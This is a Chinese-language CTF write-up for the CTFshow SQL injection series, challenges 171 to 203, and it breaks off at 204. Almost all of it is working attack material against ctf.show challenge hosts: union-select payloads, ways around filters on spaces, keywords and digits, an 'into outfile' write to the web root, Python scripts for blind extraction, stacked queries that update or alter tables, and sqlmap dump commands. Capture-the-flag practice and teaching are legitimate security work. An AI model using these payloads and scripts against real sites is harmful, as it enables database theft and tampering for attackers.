CTFSHOW—sql注入

171
order by 判断下
再union select联合查询下，数据库，表，列，字段
flag在password字段里

-1' union select 1,2,password from ctfshow_user --+

172
与171一样，多加了个表少了个列而已

-1' union select username,password from ctfshow_user2 --+

173
同上

1' union select id,username,password from ctfshow_user3--+
1' union select id,hex(username),hex(password,40) from ctfshow_user3 -- -
1' union select id,hex(username),right(password,40) from ctfshow_user3 -- -

感觉这两道题出题人屏蔽回显：flag的本意是要对回显进行下编码，可是回显的flag里并不包含flag,所以编码不编码都可以。要是编码可以hex()转下16进制，或者to_base64()等等。
174

可以用replace函数将禁止输出的转换为别的字符，输出后再转回去

0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23

175
如果返回结果中没有ASCII码在 00-7f范围的，才会查询成功。
几乎将上屏蔽了所有的字符，如果root权限的话可以把得到的结果写到一个文件。

0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+

176
过滤了select 大写绕过

-1' union sElect id,username,password from ctfshow_user where username='flag'--+

177

1'and'1'='1

用这个payload,可以检测出过滤了空格
通过注释绕过空格
通过括号绕过空格
反引号对表名字列名字的特殊性
Tab键%09
两个空格代替一个空格，用Tab代替空格，%a0=空格：
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/

-1'/**/union/**/select/**/id,username,`password`from`ctfshow_user`where`username`='flag'%23

-1'%0bunion%0aselect%09id,username,`password`from`ctfshow_user`where`username`='flag'%23

178
/**/被过滤

-1'%09union%09select%09id,username,password%09from%09ctfshow_user%23

179

-1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%23

180
burp跑id跑出来的

1111111'or(id=26)and'b'='b

1111111’是为了闭合那个!=flag,要没有这句直接输入26就好
181

1111'or(id=26)and'a'='a

182

1111'or(id=26)and'a'='a

183

mysql> select 'xxxyyy' regexp '^xx';
 
+-----------------------+
| 'xxxyyy' regexp '^xx' |
+-----------------------+
|           1 |
+-----------------------+
1 row in set (0.00 sec)
查询xxxyyy字符串中是否以xx开头，结果值为1，表示值为true，满足条件。

#-*- coding:utf-8 -*-
import string #导入string这个模块
print string.digits  #输出包含数字0~9的字符串
print string.letters  #包含所有字母(大写或小写)的字符串
print string.lowercase #包含所有小写字母的字符串
print string.uppercase  #包含所有大写字母的字符串
print string.punctuation #包含所有标点的字符串
print string.ascii_letters #与string.letters一样
顺便记下吧，要不总忘

regexp函数与like函数用来支持正则表达式
count()是统计，这个sql语句是对table_name表中的所有行记录做个统计，就是查出表中有多少行数据。
用的right,也可以用substr有点不太准确

import requests
import string
str1=string.digits+string.ascii_letters+string.punctuation
url="http://151bb639-2c31-4b57-9012-5efa4339852f.chall.ctf.show:8080/select-waf.php"
flag="}"
for k in range(2,100):
    for i in str1:
        payload="`ctfshow_user`where(right(pass,%d))like'%s'"%(k,i+flag)
        # print(payload)
        data={
            'tableName':payload
        }
        talk=requests.post(url=url,data=data)
        if "$user_count = 1;" in talk.text:
            flag=i+flag
            print(flag)
            break

184
where被过滤掉了找个可以替代的，并且这个没过滤空格.
用join进行联合查询，即可注入。详细了解join语法可看这篇文章：
https://www.cnblogs.com/reaptomorrow-flydream/p/8145610.html
妈的要被这题气死，因为没看见过滤了单双引号。。tmd改了一下午脚本（写完还忘保存了）
直接搬了两位师傅的，第一个应该是群主师傅的改良版

import requests
#str1="flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}"
url = "http://f15ac2ca-94b7-4257-a52a-00e52ecee805.chall.ctf.show/select-waf.php"

flag = 'flag{'
for i in range(45):
    if i <= 5:
        continue
    for  j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))"
        }
        r = requests.post(url,data=data)
        if r.text.find("$user_count = 43;")>0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break


import requests

url = '''http://e5e91710-3aa2-4752-a2a0-68a6c18fee26.chall.ctf.show/select-waf.php'''
data = {"tableName":""}
flag = 'flag{'

for x in range(6,50):
    for y in r'abcdefghijklmnopqrstuvwxyz0123456789{-}':
        #字典：flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}   #群主亲传效率高
        temp = "0x"+(flag+y).encode('hex')
        data["tableName"]='ctfshow_user x right join ctfshow_user y on left(y.pass,%d) like %s'%(x,temp)
        #print(data)
        s = requests.post(url,data = data)
        #print(s.text)  
        if '$user_count = 22;' not in s.text:
            flag =  flag + y
            print(flag)
            break

185
过滤了数字，

import requests
url = "http://79ef2075-ac91-4c03-adb9-c2319bc040ed.chall.ctf.show:8080/select-waf.php"
flag = ''
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num
for i in range(50):
    for j in range(127):
        data = {
            "tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp(char({2})))".format(createNum(i),createNum(1),createNum(j))
        }
        r = requests.post(url, data=data)
        if "$user_count = 43;" in r.text:
            if chr(j)!='.':

                flag += chr(j)
                print(flag)
                break


# flag="W{C71C97F9-5610-45B1-9E29-F3FF73ADD0F6}"
# print(flag.lower())

186

import requests
url = "http://3a7abf5d-8f36-4cab-8058-02c972aa00a0.chall.ctf.show:8080/select-waf.php"
flag = ''
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num
for i in range(50):
    for j in range(127):
        data = {
            "tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp(char({2})))".format(createNum(i),createNum(1),createNum(j))
        }
        r = requests.post(url, data=data)
        if "$user_count = 43;" in r.text:
            if chr(j)!='.':

                flag += chr(j)
                print(flag)
                break


# flag="1111IHW{D72377E0-FF80-44C2-9D32-F172DC25E04F}"
# print(flag.lower())

187
md5(string,true)函数在指定了true的时候，是返回的原始 16 字符二进制格式。也就是说会返回这样子的字符串：'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c

提供两个字符串： ffifdyop、129581926211651571912466741651878684928

content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b

188
SELECT * FROM TEST WHERE username = 0
查到全部结果：

USER_ID	USERNAME
1	Jason
2	OOO
3	Stack
4	Overflow
username=0

pass为0是因为密码比较为弱类型，字符串被转为0

username:0||1
password:0

189

import requests
url="http://9d4a4fc2-c2f3-4f35-8775-3e6d594cac14.chall.ctf.show:8080/api/index.php"
flag=""
for i in range(1,10000):

    head=32
    tail=127
    mid=(head+tail)>>1
    while head<tail:

        payload="if(ascii(substr(load_file('/var/www/html/api/index.php'),{0},1))>{1},1,0)".format(str(i),str(mid))
        data={
            'username':payload,
            'password':'1'
        }
        talk=requests.post(url=url,data=data)
        if "查询失败" in talk.json()['msg']:
            head=mid+1
        else:
            tail=mid
        mid=(head+tail)>>1

    flag=flag+chr(head)
    print(data)
    print(flag)

190

import requests
url="http://76887eea-2b05-4568-8286-11e205eae400.chall.ctf.show:8080//api/"
flag=""
for i in range(1,1000):
    head=32
    tail=127
    mid=(head+tail)>>1
    while head<tail:
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload3="select`f1ag`from(ctfshow_fl0g)"
        payload="admin' and if(ascii(substr(({0}),{1},1))>{2},1,0) -- ".format(payload3,i,mid)
        data={
            'username':payload,
            'password':'1'
        }

        talk=requests.post(url=url,data=data)
        if "密码错误" == talk.json()['msg']:            
            head=mid+1
        else:
            tail=mid
        mid=(head+tail)>>1
    flag=flag+chr(mid)
    print(flag)

191

import requests
url="http://d7d6dff2-db88-497e-ba34-62ef5cb2280c.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}':        
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload3="select`f1ag`from(ctfshow_fl0g)"
        payload="admin' and if(substr(({0}),{1},1)='{2}',1,0) and '1'='1".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }

        talk=requests.post(url=url,data=data)
        if "密码错误" == talk.json()['msg']:
            flag+=j
            print(flag)
#还可以用ord函数

192
同191

import requests
url="http://f6db9285-fe7d-4699-87e3-c2c239528412.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':        
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload3="select`f1ag`from(ctfshow_fl0g)"
        payload="admin' and if(substr(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }

        talk=requests.post(url=url,data=data)
        if "密码错误" in talk.json()['msg']:
            flag+=j
            print(flag)

193

import requests
url="http://e2394be5-bf88-4b7c-b742-3fc88ff2a46b.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':        
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
        payload3="select`f1ag`from(ctfshow_flxg)"
        payload="admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }

        talk=requests.post(url=url,data=data)
        if "密码错误" in talk.json()['msg']:
            flag+=j
            print(flag)
#可以用mid,left,right

194

import requests
url="http://9f97023d-32c0-4761-8325-0fdb950b076e.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':        
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
        payload3="select`f1ag`from(ctfshow_flxg)"
        payload="admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }

        talk=requests.post(url=url,data=data)
        if "密码错误" in talk.json()['msg']:
            flag+=j
            print(flag)

195

6;update(ctfshow_user)set`username`=6;
6;update(ctfshow_user)set`pass`=123;
username:6
password:123

196

username:6;select(6);
password:6

197-198

username:1;show tables;
password:ctfshow_user
或者用
0;alter table ctfshow_user change column `pass` `ppp`
varchar(255);
alter table ctfshow_user change column `id` `pass` varchar(255);
alter table ctfshow_user change column `ppp` `id` varchar(255);
这种师傅的方法把id和密码调换一下，这样返回值就是id,因为存在admin用户，所以再爆破下password就好，admin需要16进制，因为username没有单引号，不会被当中字符转会出错。

199-200

username:1;show tables;
password:ctfshow_user

201

py sqlmap.py -u http://ef10ecde-5d52-4969-8cce-f6667883b929.chall.ctf.show:8080/api/?id=1 --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump

202

py sqlmap.py http://58b01807-5ef0-4a36-8890-5248a7bd48a9.chall.ctf.show:8080/api/ --data="id=1" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump

203

py sqlmap.py http://5ce3d12a-eac4-48ad-8dbe-587ebabe5de2.chall.ctf.show:8080/api/index.php --method=PUT --data="id=1" --headers="Content-Type: text/plain" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump

204